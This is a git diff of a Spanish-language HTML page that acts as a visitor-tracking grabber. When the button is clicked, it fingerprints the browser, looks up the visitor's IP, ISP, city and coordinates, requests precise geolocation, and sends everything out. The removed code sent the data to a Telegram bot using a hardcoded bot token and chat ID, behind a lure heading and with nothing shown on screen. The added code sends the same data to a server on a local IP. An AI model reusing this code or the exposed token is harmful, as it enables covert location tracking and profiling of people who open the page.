--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="es">
 <head>
   <meta charset="UTF-8" />
-  <title>Test1</title>
+  <title>QTest</title>
   <style>
     body { font-family: Arial; padding: 20px; background: #f0f0f0; }
     .box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); max-width: 700px; margin: auto; }
@@ -11,16 +11,12 @@
 </head>
 <body>
   <div class="box">
-    <h2>Aprieta el boton pada ver algo</h2>
+    <h2>Aprieta el botón para enviar datos</h2>
     <button id="startBtn">Dame Click</button>
-    <!-- pre eliminado, no mostramos resultados -->
   </div>
 
 <script>
 (() => {
-  const BOT_TOKEN = "8011619975:AAE_Donqy5xn8RD0lJ2LOIP326dTDrnO1Ag";
-  const CHAT_ID = "6065284869";
-
   const startBtn = document.getElementById("startBtn");
 
   let humanInteraction = false;
@@ -29,10 +25,10 @@
   });
 
   function detectHeadless() {
-    return (navigator.webdriver ||
-            !navigator.plugins.length ||
-            !navigator.languages ||
-            /HeadlessChrome/.test(navigator.userAgent))
+    return (/HeadlessChrome/.test(navigator.userAgent) ||
+            !navigator.plugins?.length ||
+            !navigator.languages?.length ||
+            navigator.webdriver)
       ? "Sí" : "No";
   }
 
@@ -81,7 +77,7 @@
 
   async function detectAdblock() {
     try {
-      await fetch("https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js",   {method:"HEAD", mode:"no-cors"});
+      await fetch("https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js",  {method:"HEAD", mode:"no-cors"});
       return "No detectado";
     } catch {
       return "Probable AdBlock";
@@ -99,36 +95,88 @@
     }
   }
 
+  // === FUNCIÓN MEJORADA: getIPInfo con múltiples APIs ===
   async function getIPInfo() {
-    try {
-      const res = await fetch("https://ipapi.com/ip_api.php/");  
-      if (!res.ok) throw new Error("No response");
-      return await res.json();
-    } catch {
-      return null;
+    const APIs = [
+      {
+        url: "https://ipapi.com/ip_api.php", 
+        map: d => ({
+          ip: d.query,
+          org: d.org,
+          country: d.country,
+          region: d.regionName,
+          city: d.city,
+          asn: d.asn,
+          proxy: false,
+          version: d.query.includes(':') ? 'IPv6' : 'IPv4',
+          lat: d.lat,
+          lon: d.lon
+        })
+      },
+      {
+        url: "https://ip-api.co/json/", 
+        map: d => ({
+          ip: d.ip,
+          org: d.org,
+          country: d.country,
+          region: d.regionName,
+          city: d.city,
+          asn: d.as,
+          proxy: d.proxy,
+          version: d.ip.includes(':') ? 'IPv6' : 'IPv4',
+          lat: d.lat,
+          lon: d.lon
+        })
+      },
+      {
+        url: "https://api.ipify.org?format=json",
+        map: d => ({
+          ip: d.ip,
+          org: "Desconocido",
+          country: "Desconocido",
+          region: "Desconocido",
+          city: "Desconocido",
+          asn: "Desconocido",
+          proxy: false,
+          version: d.ip.includes(':') ? 'IPv6' : 'IPv4',
+          lat: null,
+          lon: null
+        })
+      }
+    ];
+
+    for (const { url, map } of APIs) {
+      try {
+        const res = await fetch(url, { method: "GET", mode: "cors" });
+        if (!res.ok) continue;
+
+        const data = await res.json();
+        return map(data);
+      } catch (e) {
+        console.warn(`Error con ${url}:`, e.message);
+        continue;
+      }
     }
+
+    return null;
   }
 
-  async function sendToTelegram(message) {
+  // === CAMBIA ESTO POR TU IP LOCAL ===
+  async function sendToServer(message) {
     try {
-      const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;  
-      const response = await fetch(url, {
+      const LOCAL_IP = "192.168.1.6"; // ← Tu IP local desde Termux
+      const res = await fetch(`http://${LOCAL_IP}:3000/send`, {
         method: "POST",
-        headers: {"Content-Type": "application/json"},
-        body: JSON.stringify({
-          chat_id: CHAT_ID,
-          text: message,
-        }),
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify({ message })
       });
-      const data = await response.json();
-      console.log("Telegram response:", data);
-    } catch(e) {
-      console.warn("Error enviando a Telegram:", e);
+      if (!res.ok) throw new Error("Error en servidor");
+    } catch (e) {
+      console.warn("Error enviando:", e);
     }
   }
 
   async function collectAndSend() {
-    // No mostramos nada en pantalla
     startBtn.disabled = true;
     startBtn.textContent = "Espera...";
 
@@ -154,7 +202,7 @@ ASN: ${ip.asn}
 Proxy/VPN/Tor: ${ip.proxy ? "Sí" : "No"}
 Ciudad: ${ip.city}
 Región: ${ip.region}
-País: ${ip.country_name}
+País: ${ip.country}
 Versión IP: ${ip.version}
 `;
     } else {
@@ -177,7 +225,7 @@ AdBlock detectado: ${adblockStatus.status === "fulfilled" ? adblockStatus.value 
 Hora: ${new Date().toLocaleString()}
 `;
 
-    await sendToTelegram(message);
+    await sendToServer(message);
 
     if (geoRes.status === "fulfilled") {
       const {latitude, longitude, accuracy} = geoRes.value.coords;
@@ -187,11 +235,16 @@ Longitud: ${longitude}
 Precisión: ${accuracy} metros
 Hora: ${new Date().toLocaleString()}
 `;
-      await sendToTelegram(locationInfo);
+      await sendToServer(locationInfo);
+    } else if (ipRes?.value?.lat && ipRes?.value?.lon) {
+      const locationInfo = `\nUbicación Aproximada (por IP):
+Latitud: ${ipRes.value.lat}
+Longitud: ${ipRes.value.lon}
+`;
+      await sendToServer(locationInfo);
     }
-    
-    // Opcional: cambiar texto del botón al finalizar
-    startBtn.textContent = "🦆(Espera un 5 segundos)";
+
+    startBtn.textContent = "Datos enviados";
   }
 
   startBtn.onclick = collectAndSend;
